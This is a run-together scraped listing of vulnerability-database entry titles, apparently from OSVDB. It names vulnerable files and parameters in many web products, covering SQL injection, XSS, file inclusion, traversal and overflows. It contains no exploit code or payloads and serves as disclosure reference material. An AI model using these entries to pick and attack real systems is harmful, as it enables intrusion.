Transport HTTP_Request_Parser Method Long Host Header Remote DoS [49761] WEBBDOMAIN Quiz Admin Login Functionality getin.php username Parameter SQL Injection [49760] WEBBDOMAIN Polls Admin Login Functionality getin.php username Parameter SQL Injection [49759] WEBBDOMAIN Petition Admin Login Functionality getin.php username Parameter SQL Injection [49720] WEBBDOMAIN WebShop Admin Section getin.php Username Parameter SQL Injection [49719] WEBBDOMAIN WebShop detail.php name Parameter XSS [49718] WEBBDOMAIN WebShop detail.php id Parameter SQL Injection [49680] Mini Web Calendar php/cal_pdf.php thefile Parameter Traversal Arbitrary File Access [49679] Mini Web Calendar php/cal_default.php URL Parameter XSS [49640] wims coqweb Multiple Temporary File Symlink Arbitrary File Overwrite [49637] hMailServer PHPWebAdmin initialize.php hmail_config[includepath] Parameter Remote File Inclusion [49636] hMailServer PHPWebAdmin index.php page Parameter Traversal Local File Inclusion [49568] Sun Java Web Start BasicService showDocument Method file:// URL Handling Arbitrary Program Execution [49542] U-Mail Webmail edit.php Multiple Variable Arbitrary Remote File Overwrite [49512] SFS EZ Webring category.php cat Parameter SQL Injection [49480] InstallShield Update Service Agent isusweb.dll ActiveX ExecuteRemote Call 404 Response DoS [49468] CA ARCserve Backup RPC Interface (asdbapi.dll) Traversal Arbitrary Command Execution [49465] A-LINK WL54AP3 / WL54AP2 Management Interface Domain Name XSS [49422] WebCards admin.php Image Macro File Upload Arbitrary PHP Code Execution [49421] WebCards admin.php user Parameter SQL Injection [49420] WebGUI lib/WebGUI/Asset.pm loadModule() Function Arbitrary Remote Code Execution [49383] Avaya SIP Enablement Services (SES) Server Remote Management Interface Core Router Update Request Remote DoS [49362] AutomatedShops WebC Shopping Cart webc.emf Handling Format String [49361] AutomatedShops WebC Shopping Cart webc.cgi Symlink Local Privilege Escalation [49360] AutomatedShops WebC Shopping Cart Environment Variable Handling Local Overflow [49359] AutomatedShops WebC Shopping Cart webc.cgi Script Name Handling Remote Overflow [49288] Oracle BEA WebLogic Server Servlets Unspecified Authenticated Remote Issue [49287] Oracle BEA WebLogic Workshop NetUI Pageflows Unspecified Remote Issue [49286] Oracle BEA WebLogic Server WLS Console Unspecified Remote Issue [49285] Oracle BEA WebLogic Workshop NetUI Tags Unspecified Remote Issue [49284] Oracle BEA WebLogic Server Servlets Unspecified Unauthenticated Remote Issue [49283] Oracle BEA WebLogic Server Plugins for Apache Remote Transfer-Encoding Overflow [49263] PhpWebGallery isadmin.inc.php user[language] Parameter Traversal Local File Inclusion [49262] PhpWebGallery init.inc.php Multiple Parameter Traversal Local File Inclusion [49245] WebSVN rss.php rev Variable Traversal Arbitrary File Overwrite [49244] WebSVN index.php URL Parameter XSS [49240] Ultimate Webboard webboard.php Category Parameter SQL Injection [49230] Microsoft Outlook Web Access (OWA) exchweb/bin/redir.asp URL Variable Arbitrary Site Redirect [49185] PhpWebGallery admin/include/isadmin.inc.php Multiple Parameter XSS [49162] PhpWebGallery plugins/event_tracer/event_list.php create_function Function Arbitrary PHP Code Execution [49161] PhpWebGallery comments.php sort_by Parameter SQL Injection [49158] WEB//NEWS parse/module_search.php catid Parameter SQL Injection [49155] WebGUI Arbitrary Password Reset [49154] WebGUI Unspecified XSS [49151] Sports Clubs Web Panel index.php p Parameter Traversal Local File Inclusion [49149] Hummingbird Xweb Hummingbird.XWebHostCtrl.1 ActiveX (hclxweb.dll) PlainTextPassword Property Overflow [49139] Webscene eCommerce productlist.php level Parameter SQL Injection [49104] IBM Rational ClearQuest CQWeb Login Page id Field Manipulation Information Disclosure [49070] Websense Reporter Module CreateDbInstall.log Local Admin Password Disclosure [49065] Sun Java System Web Proxy Server FTP Subsystem Unspecified Remote Overflow [49034] Blue Coat K9 Web Protection Client-side Javascript Authentication Bypass [48988] Apple Mac OS X Server Weblog Posting ACL Weakness [48954] PHP Web Explorer edit.php file Parameter Traversal Local File Inclusion [48953] PHP Web Explorer main.php refer Parameter Traversal Local File Inclusion [48915] WebBiscuits Modules Controller wce.download.php download Parameter Traversal Arbitrary File Access [48858] H-Sphere WebShell actions.php Multiple Parameter CSRF [48857] H-Sphere WebShell actions.php Multiple Parameter XSS [48809] Website Directory index.php keyword Parameter XSS [48805] JMweb MP3 Music Audio Search and Download Script download.php src Parameter Traversal Local File Inclusion [48804] JMweb MP3 Music Audio Search and Download Script listen.php src Parameter Traversal Local File Inclusion [48796] V-webmail redirect.php to Variable Arbitrary Site Redirect [48795] V-webmail login.php username Field SQL Injection [48794] V-webmail Malformed Session Data Temporary Directory Disclosure [48793] V-webmail Login Page imap_open() Function Path Disclosure [48783] Mozilla Firefox keypress User Interface Event Dispatcher DoS [48731] WebBiscuits Multiple Products common/theme/default/header_setup.php Multiple Parameter Remote File Inclusion [48727] Adult Banner Exchange Website click.php targetid Parameter SQL Injection [48664] ParsaWeb CMS default.aspx Multiple Parameter SQL Injection [48624] Addalink Approved Field Remote Site Web-site Addition Approval [48610] IBM Tivoli Netcool Webtop Browser Cached Privileges Weakness [48598] Diebold Global Election Management System (GEMS) Graphic Interface Widget Based Protection Bypass [48518] JETIK-WEB sayfa.php kat Parameter SQL Injection [48516] web-cp sendfile.php filelocation Parameter Arbitrary File Access [48472] Apple iPod Touch WebKit CSS Import Statement Handling Arbitrary Code Execution [48453] x10 Automatic MP3 Search Engine Script includes/function_core.php webroot Parameter Remote File Inclusion [48452] x10 Automatic MP3 Search Engine Script templates/layout_lyrics.php webroot Parameter Remote File Inclusion [48426] Peachtree Accounting ActiveX (PAWWeb11.ocx) ExecutePreferredApplication() Method Arbitrary Program Execution [48419] Unreal Tournament 3 WebAdmin ImageServer Unspecified Traversal Arbitrary File Access [48318] Mercurial hgweb allowpull Permission Enforcement Weakness [48282] HyperStop Web Host Directory admin/backup/db Direct Request Database Disclosure [48262] Google Chrome WebKit Arbitrary JAR Execution (Google Mule) [48240] Apple Safari on iPhone / iPod WebKit _web_drawInRect:withFont:ellipsis:alignment:measureOnly Function Crafted JavaScript Alert Call DoS [48232] H-Sphere webshell4 login.php Multiple Parameter XSS [48223] Kantan WEB Server Unspecified Traversal Arbitrary File Access [48222] Kantan WEB Server Unspecified XSS [48200] WebPortal CMS download.php aid Parameter SQL Injection [48175] Red Hat Directory Server Directory Server Gateway (DSGW) Interface adminutil Library Unspecified XSS [48174] Red Hat Directory Server Directory Server Administration Express Interface adminutil Library Unspecified XSS [48152] Sun Management Center (SMC) PRM Web Page Unspecified DoS [48143] IBM WebSphere Application Server (WAS) Servlet Engine/Web Container Unspecified Issue (PK64302) [48011] WebCMS index.php Multiple Parameter SQL Injection [48010] WebCMS index.php patron Parameter XSS [47915] aspWebAlbum album.asp message Parameter XSS [47914] aspWebAlbum album.asp txtUserName Parameter SQL Injection [47913] aspWebAlbum Unrestricted File Upload Arbitrary ASP Code Execution [47864] Web Directory Script index.php site Parameter SQL Injection [47855] Mono Sys.Web Module HTTP Header Injection [47818] Web Directory Script listing_view.php name Parameter SQL Injection [47817] Fujitsu Web-Based Admin View URI Traversal Arbitrary File Access [47803] webEdition CMS Unspecified Script we_objectID Parameter SQL Injection [47791] Civic Website Manager Calendar Control Unspecified XSS [47759] CRM-CTT Interleave Crafted Filename WebDAV Database Query DoS [47752] Trend Micro Multiple Products Web Management Predictable Token Authentication Bypass [47700] Oracle WebLogic Server Unspecified Remote Information Disclosure [47699] Oracle WebLogic Server Unspecified Local Issue [47698] Oracle WebLogic Server Unspecified Complex Local Issue [47697] Oracle WebLogic Server Console / WLST Unspecified Remote Issue [47696] Oracle BEA WebLogic Server Unspecified Remote DoS [47695] Oracle WebLogic Server UDDI Explorer Unspecified Remote Issue [47694] Oracle WebLogic Server Plugins Unspecified Remote Issue [47631] IBM WebSphere Portal Server Unspecified Authentication Bypass [47595] TimeTrex interface/Login.php Multiple Parameter XSS [47592] Anzio Web Print Object (WePO) ActiveX mainurl Variable Overflow [47586] Alcatel-Lucent OmniSwitch Agranet-Emweb Management Server Session Cookie Handling Remote Overflow [47471] WEBrick in Ruby WEBrick::HTTP::DefaultFileHandler Crafted HTTP Request DoS [47425] Sun Java System Web Proxy Server FTP Subsystem Unspecified Remote DoS [47383] PHP-Ring Webring System admin/wr_admin.php Crafted Admin Cookie Remote Authentication Bypass [47357] IBM WebSphere Portal Unspecified Remote Authentication Bypass [47344] Cisco Webex Meeting Manager WebexUCFObject ActiveX (atucfobj.dll) NewObject() Method Overflow [47290] Apple Safari WebCore STYLE Element CSSStyleSheet Object ownerNode Property Heap Corruption [47288] Apple iPhone / iPod touch WebKit JavaScriptCore Garbage Collection Unspecified Memory Corruption [47276] Apple Xcode tools WebObjects WOHyperlink Implementation Non-local URL Session Information Disclosure [47272] @Mail webmail/webadmin/.htpasswd Permission Weakness Local Information Disclosure [47271] @Mail webmail/libs/Atmail/Config.php Permission Weakness Local Information Disclosure [47267] IBM WebSphere Application Server (WAS) Security Component PropFilePasswordEncoder Utility Unspecified Issue [47266] IBM WebSphere Application Server (WAS) System Management/Repository Component Wsadmin Unspecified Issue [47265] Blue Coat K9 Web Protection Filter Service (k9filter.exe) Referer Header Handling Buffer Overflow [47264] Blue Coat K9 Web Protection Filter Service (k9filter.exe) HTTP Version Response Handling Remote Overflows [47256] Sun N1 Service Provisioning System (SPS) Sun Java System Web Server Plugin Unspecified Privilege Escalation [47221] Mobius Web Publishing Software detail.php s Parameter SQL Injection [47220] Mobius Web Publishing Software browse.php id Parameter SQL Injection [47213] Trend Micro OfficeScan Web-Deployment ObjRemoveCtrl ActiveX (OfficeScanRemoveCtrl.dll) Multiple Property Overflows [47211] Web Wiz Forum log_off_user.asp CSRF [47210] Web Wiz Forum admin_category_details.asp mode Parameter XSS [47209] Web Wiz Forum admin_group_details.asp mode Parameter XSS [47208] PhpWebGallery Profile Page E-Mail Address Information Disclosure [47190] Web Wiz Rich Text Editor RTE_popup_link.asp email Parameter XSS [47164] EZWebAlbum download.php dlfilename Parameter Traversal Arbitrary File Access [47163] EZWebAlbum constants.inc photoalbumadmin Cookie Administrator Authentication Bypass [47096] Oracle Weblogic Apache Connector POST Request Overflow [47069] LunarNight Laboratory WebProxy Unspecified XSS [47062] Citrix XenServer XenAPI HTTP Interface Unspecified XSS [47058] Comdev Web Blogger Blog Page arcmonth Parameter SQL Injection [47049] WebBlizzard CMS index.php page Parameter SQL Injection [47036] Galatolo WebManager (GWM) plugins/users/index.php id Parameter SQL Injection [47035] Galatolo WebManager (GWM) all.php tag Parameter XSS [47034] Maian Weblog admin/index.php weblog_cookie Cookie Admin Authentication Bypass [47020] webCMS Portal Edition secciones/tablon/tablon.php id Parameter SQL Injection [46993] TIBCO Rendezvous (RV) Admin Interface index.html Direct Request Information Disclosure [46988] Sun Java System Web Server Redirect Feature CRLF Injection [46959] Sun Java JDK / JRE Java Web Start Untrusted Application Multiple Overflows [46958] Sun Java JDK / JRE Java Web Start CacheEntry Class writeManifest() Method Arbitrary File Creation [46957] Sun Java JDK / JRE Java Web Start Untrusted Application Arbitrary File Manipulation [46956] Sun Java JDK / JRE Java Web Start Untrusted Application Cache Location Disclosure [46909] phpDatingClub website.php page Parameter Traversal Local File Inclusion [46879] VanGogh Web CMS index.php article_ID Parameter SQL Injection [46817] XEROX CentreWare Web (CWW) Multiple Unspecified XSS [46816] XEROX CentreWare Web (CWW) Multiple Unspecified SQL Injection [46807] webXell Editor upload_pictures.php Unrestricted File Upload Arbitrary Code Execution [46798] Webdevindo-CMS index.php hal Parameter SQL Injection [46780] Microsoft Outlook Web Access (OWA) HTML Parsing Unspecified XSS [46779] Microsoft Outlook Web Access (OWA) Data Validation Unspecified XSS [46775] Brightcode Weblinks component for Joomla! index.php catid Parameter SQL Injection [46748] Academic Web Tools PHPSESSID Session Fixation [46747] Academic Web Tools room.php Message XSS [46746] Academic Web Tools rss_getfile.php file Parameter XSS [46745] Academic Web Tools /hta/htmlarea.js.php&quot [46744] Academic Web Tools login.php URL XSS [46743] Academic Web Tools rating.php book_id Parameter SQL Injection [46742] Academic Web Tools download.php dfile Variable Traveral Arbitrary File Access [46709] Direct Web Remoting (DWR) Multiple Unspecified XSS [46644] Flux CMS webinc/bxe/scripts/loadsave.php Request Body PHP File Overwrite Arbitrary Code Execution [46642] aspWebCalendar calendar_admin.asp Unrestricted File Upload Arbitrary Code Execution [46595] Avaya Message Storage Server (MSS) Admin Interface S/FTP Storage Configuration Arbitrary Command Execution [46594] Avaya Message Storage Server (MSS) Admin Interface Name Server Lookup Arbitrary Command Execution [46593] Avaya Message Storage Server (MSS) Admin Interface Ping Utility Arbitrary Command Execution [46592] Avaya Message Storage Server (MSS) Admin Interface TCP/IP Network Configuration Arbitrary Command Execution [46591] Avaya Message Storage Server (MSS) Admin Interface External Host Modification Arbitrary Command Execution [46590] Avaya Message Storage Server (MSS) Admin Interface Windows Domain Parameter Arbitrary Command Execution [46589] Avaya Message Storage Server (MSS) Admin Interface Time Settings Arbitrary Command Execution [46588] Avaya Message Storage Server (MSS) Admin Interface Alarm Settings Arbitrary Command Execution [46587] Avaya Message Storage Server (MSS) Admin Interface Command Line History Form Arbitrary Command Execution [46586] Avaya Message Storage Server (MSS) Admin Interface Maintenance Form Arbitrary Command Execution [46585] Avaya Message Storage Server (MSS) Admin Interface Server Event Configuration Arbitrary Command Execution [46528] Drinks Website drink.php drinkid Parameter SQL Injection [46527] Riddles Website riddle.php riddleid Parameter SQL Injection [46526] Tips Website tip.php tipid Parameter SQL Injection [46520] Cheats Complete Website item.php itemid Parameter SQL Injection [46519] Jokes Website joke.php jokeid Parameter SQL Injection [46510] WebGUI Collaboration System RSS Feed Authentication Bypass Information Disclosure [46502] Apple Safari WebKit JavaScript Array Handling Memory Corruption Arbitrary Code Execution [46500] WebCalendar send_reminders.php Multiple Parameter Remote File Inclusion [46494] NiTrO Web Gallery albums.php CatId Parameter SQL Injection [46443] Galatolo WebManager (GWM) view.php id Parameter SQL Injection [46442] Galatolo WebManager (GWM) index.php com Parameter Traversal Local File Inclusion [46441] Galatolo WebManager (GWM) admin/plugins.php plugin Parameter Traversal Local File Inclusion [46440] WEBalbum photo_add-c.php Multiple Parameter XSS [46433] Easy Webstore index.php cat_path Parameter SQL Injection [46230] BitKinex WebDAV Client PROPFIND Command Traversal Arbitrary File Manipulation [46213] BitTorrent Web UI Malformed HTTP Range Header DoS [46212] uTorrent Web UI Malformed HTTP Range Header DoS [46208] Kronos webTA com.threeis.webta.H720editProjectInfo Description Field XSS [46207] Kronos webTA com.threeis.webta.H710selProject Description Field XSS [46186] Advanced Webhost Billing System (AWBS) news.php viewnews Parameter SQL Injection [46163] WebChamado admin/index.php eml Parameter SQL Injection [46162] WebChamado index.php eml Parameter SQL Injection [46161] WebChamado lista_anexos.php tsk_id Parameter SQL Injection [46153] SHOUTcast Admin Panel Login Interface username Parameter XSS [46144] PHP JOBWEBSITE PRO jobseekers/JobSearch3.php Multiple Parameter SQL Injection [46137] XEROX WorkCentre Web Server Unspecified XSS [46136] XEROX Copier / Printer Multiple Products Web Server Unspecified XSS [46087] Logitech Desktop Messenger BackWeb ActiveX Unspecified Overflow [46076] BackWeb Lite Install Runner LiteInstActivator.dll ActiveX (LiteInstActivator.dll) Overflow [46048] Real-Estate-Website location.asp name Parameter XSS [46047] Real-Estate-Website location.asp location Parameter SQL Injection [46003] F5 FirePass /vdesk/admincon/webyfiers.php css_exceptions Parameter XSS [45961] IBM WebSphere Application Server (WAS) SOAP Security Header Unspecified Exposure [45938] Weblosning result.php search Parameter XSS [45937] Weblosning index2.php Multiple Parameter SQL Injection [45932] SMEweb order.php new_s Parameter XSS [45931] SMEweb bb.php page Parameter XSS [45930] SMEweb search.php keyword Parameter XSS [45929] SMEweb catalog.php data Parameter XSS [45928] SMEweb catalog.php Multiple Parameter SQL Injection [45923] MDaemon WorldClient Interface Message Handling Multiple Field Overflow [45873] Cisco WebNS SSHield w/ OpenSSH Crafted Large Packet Remote DoS [45864] Social Site Generator webadmin/download_file.php file Parameter Arbitrary File Access [45863] Social Site Generator webadmin/download.php file Parameter Arbitrary File Access [45854] Alt-N SecurityGateway.dll Administration Interface username Field Remote Overflow [45839] BEA WebLogic Server Admin Server Security Policy Propogation Weakness [45838] BEA WebLogic Server SSL MitM Plaintext Information Disclosure [45830] PHP Foreign Function Interface (ffi) Extension Arbitrary DLL Loading safe_mode Restriction Bypass [45814] Microsoft IE Arbitrary Website Zone Addition Domain Supression DoS [45786] vtiger CRM SOAP Webservice Inactive Account Access Bypass [45776] Web Slider index.php slide Parameter SQL Injection [45749] XEROX DocuShare docushare/dsweb/ServicesLib/Group XSS [45748] XEROX DocuShare dsdn/dsweb/Services/User XSS [45747] XEROX DocuShare dsdn/dsweb/SearchResults XSS [45729] KENT-WEB Web Mart Unspecified XSS [45718] eMule X-Ray Web Server Unspecified Memory Corruption [45705] Apple Mac OS X Image Capture Embedded Web Server Traversal Arbitrary File Access [45688] Cisco Cisco Service Control Engine (SCE) SSH Server Management Interface Traffic Remote DoS [45649] SAP Web Application Server sap/bc/gui/sap/its/webgui/ URL XSS [45627] XEROX WorkCentre Web Server Unspecified XSS [45625] Sun Java System Web Server Advanced Search Mechanism Unspecified XSS [45596] eZ publish Administrator Interface Information Disclosure [45577] Kerio Webstar WSWebServer Dynamic Library Linking Local Privilege Escalation [45576] Kerio Webstar WSAdminServer Dynamic Library Linking Local Privilege Escalation [45534] SonicWALL SSL-VPN WebCacheCleaner ActiveX FileDelete Method Traversal Arbitrary File Deletion [45508] Web Slider Admin.php admin Cookie Modification Authentication Bypass [45490] 3Com 3CRWER100-75 Router Persistent Web Page Product Information Disclosure [45460] Archangel Weblog index.php post_id Parameter SQL Injection [45415] IBM Lotus Domino Web Server Accept-Language HTTP Header Remote Overflow [45414] IBM Lotus Domino Web Server Servlet engine/Web Container Unspecified XSS [45410] web-app.org WebAPP cgi-bin/cgi-lib/instantmessage.pl moveim Function Instant Message Moving Unspecified Issue [45409] web-app.org WebAPP cgi-bin/cgi-lib/instantmessage.pl Instant Message From Field Unspecified Issue [45408] web-app.org WebAPP cgi-bin/cgi-lib/subs.pl getcgi Function String Handling Unspecified Issue [45402] web-app.org WebAPP Multiple Script memberlist.dat Verification Failure [45401] web-app.org WebAPP cgi-bin/cgi-lib/subs.pl loaduser Function Random Cookie Password Functionality Unspecified Issue [45400] web-app.org WebAPP cgi-bin/cgi-lib/user.pl editprofile3 Function .dat File Check Unspecified Issue [45399] web-app.org WebAPP cgi-bin/cgi-lib/forum_display.pl displaypost Function User Display Weakness [45398] web-app.org WebAPP cgi-bin/cgi-lib/search.pl Search String Multiple Function XSS [45396] web-app.org WebAPP Multiple Unspecified Form Input Validation Issues [45395] web-app.org WebAPP Crafted QUERY_STRING Unspecified Arbitrary File Manipulation [45387] Mjguest interface/redirect.htm.php goto Variable Arbitrary Site Redirect [45386] Multiple Vendor WebAPP Multiple Administration Functions CSRF [45369] how2ASP Webboard showQAnswer.asp qNo Parameter SQL Injection [45319] CMS WebManager-Pro index.php Multiple Parameter SQL Injection [45302] IBM WebSphere MQ Multiple Unspecified Remote Issues [45300] Aida-Web frame.html Multiple Variable Authentication Bypass Information Disclosure [45294] WebEx GpcContainer.GpcContainer.1 ActiveX Multiple Method Unspecified DoS [45286] Firefly Media Server webserver.c ws_addarg Function /xml-rpc Authorization Header Remote Format String [45266] Interspire ActiveKB Admin Interface Crafted Cookie Authentication Bypass [45218] Microsoft Outlook Web Access Cache-Control Directive Information Caching Persistence [45167] WebGroupCommunicationCenter (WGCC) message.php Multiple Parameter SQL Injection [45166] WebGroupCommunicationCenter (WGCC) profile.php userid Parameter XSS [45165] WebGroupCommunicationCenter (WGCC) profile.php id Parameter SQL Injection [45164] WebGroupCommunicationCenter (WGCC) schedule.php id Parameter SQL Injection [45163] WebGroupCommunicationCenter (WGCC) filebase.php id Parameter SQL Injection [45162] WebGroupCommunicationCenter (WGCC) picturegallery.php bildid Parameter SQL Injection [45067] WHM Interface for cPanel scripts2/listaccts search Parameter XSS [45066] WHM Interface for cPanel scripts2/changeip user Parameter XSS [45065] WHM Interface for cPanel scripts2/knowlegebase issue Parameter XSS [45043] BIGACE Web CMS jstree.php GLOBALS[_BIGACE][DIR][admin] Parameter Remote File Inclusion [45042] BIGACE Web CMS item_information.php GLOBALS[_BIGACE][DIR][admin] Parameter Remote File Inclusion [45041] BIGACE Web CMS plugin.php GLOBALS[_BIGACE][DIR][admin] Parameter Remote File Inclusion [45040] BIGACE Web CMS AdoDBConnection.php GLOBALS[_BIGACE][DIR][addon] Parameter Remote File Inclusion [45039] BIGACE Web CMS function.captcha.php GLOBALS[_BIGACE][DIR][addon] Parameter Remote File Inclusion [44986] eGroupWare Web Server Write Access Unspecified &quot [44985] RSA Authentication Agent WebID/IISWebAgentIF.dll FTP url Variable Arbitrary Site Redirect [44984] RSA Authentication Agent IISWebAgentIF.dll postdata Parameter URL-Encoded XSS [44980] Verizon Actiontec Modem Admin Interface Port External Exposure Persistence Weakness [44957] IBM WebSphere Application Server (WAS) Java Plugin Untrusted Applet Privilege Escalation [44951] Zarafa Webaccess Email Subject Preview Pane XSS [44950] Zarafa Webaccess Email Headers XSS [44948] Sun Java System Web Server / Application Server Unspecified JSP Source Disclosure [44850] Sun Java System Web Server lib/webapps/search/index.jps XSS [44832] Softbiz Web Host Directory Script search_result.php host_id Parameter SQL Injection [44830] WebGUI Data Form List View Unspecified Security Issue [44817] Mjguest interface/redirect.htm.php level Parameter XSS [44813] Novell GroupWise WebAccess JPG File Handling XSS [44805] Maian Weblog admin/inc/header.php Multiple Parameter XSS [44804] Maian Weblog admin/index.php keywords Parameter XSS [44803] Maian Weblog index.php keywords Parameter XSS [44795] Miniweb index.php Multiple Parameter SQL Injection [44776] Cezanne PeopleWeb/CznDocFolder/CznDFStartProcess.asp Multiple Parameter XSS [44775] Cezanne PeopleWeb/Cards/PayrollCard.asp Multiple Parameter XSS [44774] Cezanne PeopleWeb/Cards/CVCard.asp PersonOid Parameter XSS [44760] Grape Web Statistics includes/functions.php location Parameter Remote File Inclusion [44704] H-Sphere Webshell4 /webshell4/viewer.php fn Parameter Arbitrary File Access [44702] H-Sphere Webshell4 302 Response Manipulation Access Bypass [44691] IBM WebSphere MQ Multiple Unspecified Remote DoS [44687] IBM WebSphere MQ MQSeries runmqsc Access Restriction Bypass [44682] WEBrick in Ruby URI Multiple Encoded Traversal Arbitrary File Access [44554] Oracle Application Server Web Cache Admin Password Plaintext Disclosure [44538] Akiva WebBoard Profile Update Feature Form Field XSS [44536] Web Calendar Pro one_day.php user_id Parameter SQL Injection [44525] Oracle Application Server Crafted Request WEB-INF Directory Information Disclosure [44468] Apple Safari WebKit URL Hostname XSS [44458] Microsoft Works WkImgSrv.dll WksPictureInterface Property Remote DoS [44419] EMC DiskXtender RPC Interface Default Hardcoded Account [44418] EMC DiskXtender File System Manager RPC Interface Remote Overflow [44417] EMC DiskXtender MediaStor RPC Interface Remote Format String [44396] mxbBB mx_blogs includes/functions_weblog.php mx_root_path Parameter Remote File Inclusion [44377] Nortel Networks Communication Server 1000 Web Resources Unspecified Information Disclosure [44324] Highwall Multiple Products Management Interface Endpoint Workstation Name XSS [44323] Highwall Multiple Products Management Interface Sensor WIDS Name XSS [44322] Highwall Multiple Products Management Interface Crafted SSID XSS [44321] Highwall Multiple Products Management Interface Crafted SSID SQL Injection [44281] Interwoven WorkSite Web TransferCtrl Class ActiveX (iManFile.cab) SendNrlLink Directive Handling Memory Consumption DoS [44263] IBM WebSphere Application Server (WAS) FFDC Log Multiple Cleartext Password Disclosure (PK10136) [44262] IBM WebSphere Application Server (WAS) Samples Unspecified XSS (PK13968) [44261] IBM WebSphere Application Server (WAS) Default Messaging Component Exception Destination Unspecified Issue [44260] IBM WebSphere Application Server (WAS) Login Form Redirection HTTP Transport Persistence [44259] IBM WebSphere Application Server (WAS) ORB Comm Trace Cleartext Credential Disclosure [44258] IBM WebSphere Application Server (WAS) Startup LDAPUserRegistry Cleartext Password Disclosure [44233] Interwoven WorkSite Web TransferCtrl Class ActiveX (iManFile.cab) Server Property Double-free Arbitrary Code Execution [44232] IBM WebSphere Application Server (WAS) resources.xml Cleartext Password Disclosure [44230] IBM WebSphere Application Server (WAS) Loose Configuration Default Application Profile/Access Intent Persistence [44229] IBM WebSphere Application Server (WAS) Malformed HTTP Header DoS [44228] IBM WebSphere Application Server (WAS) Ciphersuite Downgrade Weakness [44227] IBM WebSphere Application Server (WAS) com.ibm.security.SAF.Authz.Log.Option Cross Role Log Information Disclosure [44226] IBM WebSphere Application Server (WAS) Custom Properties Cleartext Password Disclosure [44225] IBM WebSphere Application Server (WAS) Java Management Extensions (JMX) Trace Ouput Unspecified Information Disclosure (PK21335) [44223] IBM WebSphere Application Server (WAS) Web Services Security UserNameToken Cache Improper Use [44222] IBM WebSphere Application Server (WAS) on z/OS Revoked User Status Authentication Bypass [44221] IBM WebSphere Application Server (WAS) SSL Certificate CN Validation Weakness [44220] IBM WebSphere Application Server (WAS) Servlet Engine/Web Container Remote Overflow [44217] IBM WebSphere Application Server (WAS) Samples Component Unspecified Exposure (PK40213) [44207] Neat weblog index.php articleId Parameter SQL Injection [44204] IBM WebSphere Application Server (WAS) for z/OS Trace Output Information Disclosure (PK25568) [44203] IBM WebSphere Application Server (WAS) for z/OS Unspecified Exposure (PK25740) [44202] IBM WebSphere Application Server (WAS) for z/OS Java Management Extensions (JMX) Configuration Object Unspecified Exposure [44187] OTRS (Open Ticket Request System) SOAP Interface Unauthenticated Object Manipulation [44180] Sun Java System Directory Server Admin Interface Unspecified Exposure [44168] SmarterMail Web Server (SMWebSvr.exe) HTTP Request Handling Remote DoS [44128] Nortel iSD-SSL Management Interface Direct Access Weakness [44122] Nortel Multiple Products Browser-Based Management Interface (BBI) Unspecified Directory Traversal [44121] Nortel Multiple Products Browser-Based Management Interface (BBI) Unspecified XSS [44117] RoundCube Webmail Style Sheet Expression Commands XSS [44108] Webster HTTP Server URL XSS [44107] Webster HTTP Server URL Traversal Arbitrary File Access [44106] Webster HTTP Server URL Handling Remote Overflow [44068] webSPELL index.php board Parameter XSS [44061] Mitsubishi Electric GB-50 / GB-50A Web Controller servlet/MIMEReceiveServlet setRequest Command Remote DoS [44039] Borland CaliberRM StarTeam Multicast Service (STMulticastService) PGMWebHandler::parse_request Remote Overflow [44037] WebWasher on Linux URL Handling Remote DoS [43985] Webform Module for Drupal Unspecified XSS [43980] Apple Safari WebKit (JavaScriptCore/pcre/pcre_compile.cpp) PCRE Nested Repetition Count Overflow [43974] Blackboard Academic Suite webapps/blackboard/execute/viewCatalog searchText Parameter XSS [43972] Simple Web Server (SWS) Traversal Arbitrary File Access [43950] Aeries Browser Interface loginproc.asp UserName Parameter XSS [43949] Aeries Browser Interface GradebookOptions.asp GrdBk Parameter SQL Injection [43928] SLMail Pro Web Service (webcontainer.exe) HTTP Parameter Handling Overflow DoS [43927] SLMail Pro Web Service (webcontainer.exe) URI Handling Memory Corruption DoS [43899] VMware Multiple Products Crafted Virtual Machine Communication Interface (VMCI) Calls DoS [43844] RSA SecurID WebID RSA Authentication Agent (IISWebAgentIF.dll) postdata Variable Blacklist Bypass [43804] FreeWebshop.org customer.php Unspecified Remote Privilege Escalation [43794] Cisco IOS PPTP Session Termination Virtual Access Interface (IDB) Exhaustion DoS [43759] Puzzle Apps CMS core/modules/webstat/MEC/index.php THISDIR Parameter Remote File Inclusion [43744] HIS-Webshop cgi-bin/his-webshop.pl t Parameter Traversal Arbitrary File Access [43734] Aeries Browser Interface loginproc.asp SchlCode Parameter SQL Injection [43733] Aeries Browser Interface Login.asp usr Parameter XSS [43710] Kvaliitti WebDoc subcategory.asp Multiple Parameter SQL Injection [43709] Kvaliitti WebDoc categories.asp Multiple Parameter SQL Injection [43704] Nortel VPN Gateway Browser-Based Management Interface (BBI) Username Remote Overflow [43500] MYweb4net Browser Object Tag outerHTML Attribute Cross-domain Information Disclosure [43450] IBM WebSphere HTTP Request Smuggling [43449] BEA WebLogic HTTP Request Smuggling [43447] Sun SunONE Web Server HTTP Request Smuggling [43418] Uebimiau Webmail sess[auth] Variable Remote Authentication Bypass [43368] Apple Safari WebKit Cross-frame Method Instance XSS [43367] Apple Safari WebKit JavaScript Crafted Regex Handling Remote Overflow [43366] Apple Safari WebCore History Object Modification XSS [43365] Apple Safari WebCore document.domain Property XSS [43364] Apple Safari WebCore Java Applet Frame Navigation Policy Bypass [43363] Apple Safari WebCore window.open Function Page Security Context Modification XSS [43362] Apple Safari WebCore Kotoeri Input Method Password Disclosure [43361] Apple Safari WebCore Web Inspector Unspecified XSS [43360] Apple Safari WebCore document.domain property Unspecified XSS [43322] Direct Web Remoting (DWR) Framework JavaScript Object Notation (JSON) Crafted HTML Remote Data Disclosure [43321] Google Web Toolkit (GWT) Framework JavaScript Object Notation (JSON) Crafted HTML Remote Data Disclosure [43294] Ariadne CMS web-loader Unspecified Session Password Disclosure [43251] Apple Safari KHTML WebKit Crafted Web Page Remote DoS [43244] WebChat Module for eXV2 index.php roomid Parameter SQL Injection [43226] Mozilla Firefox DIV Tag Web Forgery Warning Bypass [43219] PHP cURL Library (libcurl) curl/interface.c Crafted file:// Request Restriction Bypass [43188] Web Wiz Multiple Products RTE_file_browser.asp Traversal Remote File / Directory Disclosure [43185] Webmatic Multiple Unspecified XSS [43184] Webmatic Unspecified SQL Injection [43182] Google Android SDK WebKit Framework GIF Library GIF Handling Overflow [43176] Ability Mail Server WebMail Auto-Signup Cloned User Information Disclosure [43168] GoAhead WebServer goform/QuickStart_c0 typepassword Field Password Disclosure [43167] IBM WebSphere MQ XA PROCESS_DUP_HANDLE Arbitrary Process Hijacking Local Privilege Escalation [43143] Webmedia Explorer templates/sidebar.tpl.php path_templates Parameter Remote File Inclusion [43142] 